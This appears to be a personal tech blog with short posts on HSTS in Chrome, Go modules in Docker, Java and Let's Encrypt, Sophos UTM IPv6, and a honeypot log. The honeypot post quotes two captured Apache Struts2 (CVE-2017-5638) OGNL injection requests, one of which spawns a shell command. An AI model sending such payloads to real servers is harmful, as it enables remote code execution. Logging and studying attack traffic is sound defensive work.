How to clear HSTS settings in Chrome

Developing against a site using HSTS can cause issues when there are issues, for example certificate issues. As you can not bypass them when Chrome has “learned” that the site has HSTS rules.

Luckily you can manage, and delete such entries on this page: chrome://net-internals/#hsts


go: cannot find main module; see ‘go help modules’

I was working on building a Docker image containing a go application when i ran in to the following error when running go tidy as a build step:
“go: cannot find main module; see ‘go help modules'”

The reason for this was that i had forgotten to specify a workdir in my Dockerimage (Alternatively, specified a go dir). Thus a fail safe error is triggered, as go simply gets confused over finding a go.mod in the gopath root folder, which is supposed to be within your source folder. [source]

The fix? Specify a WORKDIR in your Dockerfile.


Java + LetsEncrypt certificate giving SunCertPathBuilderException

During testing some java code i have for doing a check against i got an exception is have not seen before:

PKIX path building failed: unable to find valid certification path to requested target

After digging around i realised that the site in question has started using certificates from Lets Encrypt.

Java keeps their known certificate providers bundled with the installation, so if your JRE/JDK installation is not quite up to date, it will be as simple as to simply upgrade to the latest release. (Anything >= Oracle Java 8u101 has Lets Encrypt root cert bundled)


CVE-2017-5638 scanning still going on

I recently wrote a honey pot that i am currently playing around with. It did not take long before suspicious traffic started popping up. Many of the scans/hacking attempts are against CVE-2017-5638, which relates to a security issue in Apache Struts2 that started getting exploited in march 2017.

The scans/hacking attempts i have seen regarding this the last 24 hours are listed below, they do nothing more than to see if the seucurity hole exist.

Type 1:

GET / HTTP/1.1
Content-Type: %{(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#wmres=#context[‘com.opensymphony.xwork2.dispatcher.HttpServletResponse’]).(#wmres.getWriter().print(“S2-045 dir–***”)).(#wmreq=#context.get(‘com.opensymphony.xwork2.dispatcher.HttpServletRequest’)).(#wmres.getWriter().println(#wmreq.getSession().getServletContext().getRealPath(“/”))).(#wmres.getWriter().flush()).(#wmres.getWriter().close())}.multipart/form-data
Accept: */*
Referer: http://**my Ihoneypot P**:81
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host:**my Ihoneypot P**:81
Connection: Keep-Alive


Type 2:

GET /index.action HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Accept: */*
Content-Type: %{(#nike=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’whoami’).(#iswin=(@java.lang.System@getProperty(‘’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,’echo windows–2017′}:{‘/bin/bash’,’-c’,’echo linux–2017′})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(,#ros)).(#ros.flush())}
Host:**my Ihoneypot P**:81
Connection: Keep-Alive


How to enable IPv6 on your Sophos UTM (Former Astaro Unified Threat Management)

Step 1: After logging in to the admin interface, go to Interfaces and Routing -> IPv6, and enable “IPv6 status”. As my UTM recieve a IPv6 prefix from my ISP, i end up with this: 1   Step 2: Assign an IPv6 address to your internal interface. This address should be the first IP in your assigned IPv6 prefix. To calculate your range, copy your delegated prefix and go to this calculator. Notice that i have used a /64-prefix internally. 2   Step 3: Go to Interfaces and Routing -> IPv6 -> Prefix Advertisement. Select your internal interface. Then add the IPv6 address of your DNS Server, or the IP of your internal interface of your UTM handes DNS itself. 3   And voila, your internal clients should now be able to recieve IPv6 addresses. I recommend rebooting both the UTM and any clients if they do not get any addresses at this point.